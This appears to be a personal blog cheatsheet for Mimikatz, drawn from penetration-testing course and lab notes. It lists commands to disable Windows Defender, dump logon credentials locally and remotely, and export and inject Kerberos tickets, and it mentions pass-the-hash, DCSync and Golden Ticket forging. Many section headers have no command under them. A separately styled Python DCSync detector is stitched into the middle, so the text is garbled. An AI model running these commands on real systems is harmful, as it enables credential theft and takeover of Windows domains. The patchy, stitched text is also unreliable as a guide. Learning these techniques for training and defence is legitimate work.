Mimikatz Cheatsheet

TL;DR Mimikatz cheatsheet of things I have found useful in CRTP and the lab.

Welcome to Part I of our cheatsheet series compiled from various courses, labs, stuff we did at work, Google, etc. Most of this was spread out over various howtos. This puts it all in one place. These are cheatsheets, almost no explanation is given, just commands. The links are to howtos that provide background.

Part I: Mimikatz cheatsheet

Part II: Set-Acl cheatsheet

Part III: Get-Acl cheatsheet

Part IV: Enumerating AD cheatsheet

Background

Yes, this info is out there already, most notably Sean Metcalf’s Guide to Mimikatz. This is just my personal cheatsheet for Mimikatz compiled from my notes taken during various labs, the CRTP course, etc.

Please note that I was using Invoke-Mimikatz.ps1 most of the time, therefore my cheatsheet is heavy on commands in that syntax. Generally speaking, if you’re using the *.exe then just run what is inside the quotes. I am also partial to PowerShell_ISE.

Please note that you can run multiple commands with Invoke-Mimikatz.ps1 by simply enclosing the entire thing in single quotes and each command in double quotes. Example:

Please note that Medium often mangles quotations, even in codeblocks. If you copy/paste a command and get an error then re-type the quotes in the CLI.

Running Mimikatz at all

Defender will block an unaltered copy of Mimikatz. Please do NOT rely on this alone in the workplace. Mimikatz is open source and freely available, therefore a dedicated attacker will simply modify it enough to not trip Defender. These researchers did it just to prove a point. Therefore focus on denying an attacker the rights needed to dump credentials. Failing that, focus on basic security hygiene so there isn’t anything usable in the dump.

With that disclaimer out of the way, here is how I have used Mimikatz in labs, CRTP, etc.

Launch PowerShell as admin, add a folder exception to Defender, turn off real-time monitoring, and import the module:

Add-MpPreference -ExclusionPath "C:\Temp"
Set-MpPreference -DisableRealTimeMonitoring $true
Import-Module C:\Temp\Invoke-Mimikatz.ps1

Alternatively you can often get away with just running the AMSI bypass if you can’t turn off Defender. I have used this tactic with PowerView and PowerUp in the past:

Dumping creds with Mimikatz:

This is normally required first if running Mimikatz locally:

Invoke-Mimikatz -Command '"privilege::debug"'
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

Please note that ‘logonpasswords’ lists everything except Credential Manager, as I found out once.

List the sekurlsa commands:

Check Credential Manager for things like saved RDP passwords:

If you are using mimikatz.exe:

token::elevate
privilege::debug
sekurlsa::msv

Pass-The-Hash (PTH) with Mimikatz

Explanation, lab demo, and mitigations are here.

PTH and launch PowerShell_ISE as that user:

Pass-The-Ticket (PTT) with Mimikatz

Explanation, lab demo, and mitigations are here.

Export & list tickets:

# $sess is assumed to be an existing PSSession to TestIPAM (e.g. from New-PSSession -ComputerName TestIPAM)
Invoke-Command -ScriptBlock {Set-MpPreference -DisableRealTimeMonitoring $true} -ComputerName TestIPAM
Invoke-Command -FilePath C:\Temp\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession $sess
mkdir etc
cd .\etc
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

Copy/paste the name of the ticket to elevate with, then:

Confirm privileges:

Show tickets currently in use:

If you are having issues or getting weird errors, purge tickets and try again:

Dump creds remotely with Mimikatz

This only requires that you are running as a Domain User who has local admin rights on the remote system.

Invoke-Mimikatz -DumpCreds -ComputerName DC

DCSync

Explanation & lab demo here.

Grab the krbtgt NTLM

Forge a Golden Ticket using krbtgt hash & domain SID:

Alternatively, save the ticket for future use:

kerberos::ptt forged.kirbi
misc::cmd
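From the defender's side of the DCSync section above, here is an added example (not part of the original cheatsheet) that flags replication requests in Windows Security event 4662 records coming from anything other than a known domain controller account. The log lines are constructed samples in an assumed key=value export layout; the two GUIDs are the standard DS-Replication-Get-Changes and DS-Replication-Get-Changes-All control access rights that DCSync relies on.

```python
"""Flag possible DCSync activity in Windows Security event 4662 records.

Added example for the DCSync section; not part of the original cheatsheet.
Assumption: the SIEM exports 4662 fields as space-separated key=value pairs.
"""
import re

# Control-access-right GUIDs that directory replication (and DCSync) requires.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Constructed sample log lines (not real events): a DC replicating normally,
# a user account requesting replication rights, an unrelated 4662, and a logon.
SAMPLE_LOG = """\
EventID=4662 SubjectUserName=DC01$ SubjectDomainName=LAB ObjectType=domainDNS Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
EventID=4662 SubjectUserName=jdoe SubjectDomainName=LAB ObjectType=domainDNS Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
EventID=4662 SubjectUserName=jdoe SubjectDomainName=LAB ObjectType=user Properties=bf967aba-0de6-11d0-a285-00aa003049e2
EventID=4624 SubjectUserName=jdoe SubjectDomainName=LAB LogonType=3
"""

KV = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one key=value export line into a dict."""
    return dict(KV.findall(line))


def is_dcsync_candidate(event, dc_accounts):
    """True when a non-DC principal requested directory replication rights."""
    if event.get("EventID") != "4662":
        return False
    props = set(event.get("Properties", "").lower().split(";"))
    if not props & REPLICATION_GUIDS:
        return False
    # Domain controllers replicate legitimately; their machine accounts end in '$'.
    return event.get("SubjectUserName", "") not in dc_accounts


def find_dcsync(log_text, dc_accounts):
    """Return DOMAIN\\user for every suspicious replication request."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if is_dcsync_candidate(ev, dc_accounts):
            hits.append(f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}")
    return hits


if __name__ == "__main__":
    print(find_dcsync(SAMPLE_LOG, {"DC01$"}))  # ['LAB\\jdoe']
```

Extend the allowlist with any account that legitimately replicates in your environment (for example a directory synchronisation service account), otherwise those will show up as hits too.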

Forge a ticket to use in a trusting domain

In this case we have compromised a child domain and want to escalate to the parent domain. There is a trust relationship between them.

Load the ticket and start using privs in the parent domain:

References

Benjamin Delpy’s github with Mimikatz: https://github.com/ParrotSec/mimikatz

Sean Metcalf’s guide to Mimikatz: https://adsecurity.org/?page_id=1821

Microsoft Docs on klist: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/klist

Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from work or the lab.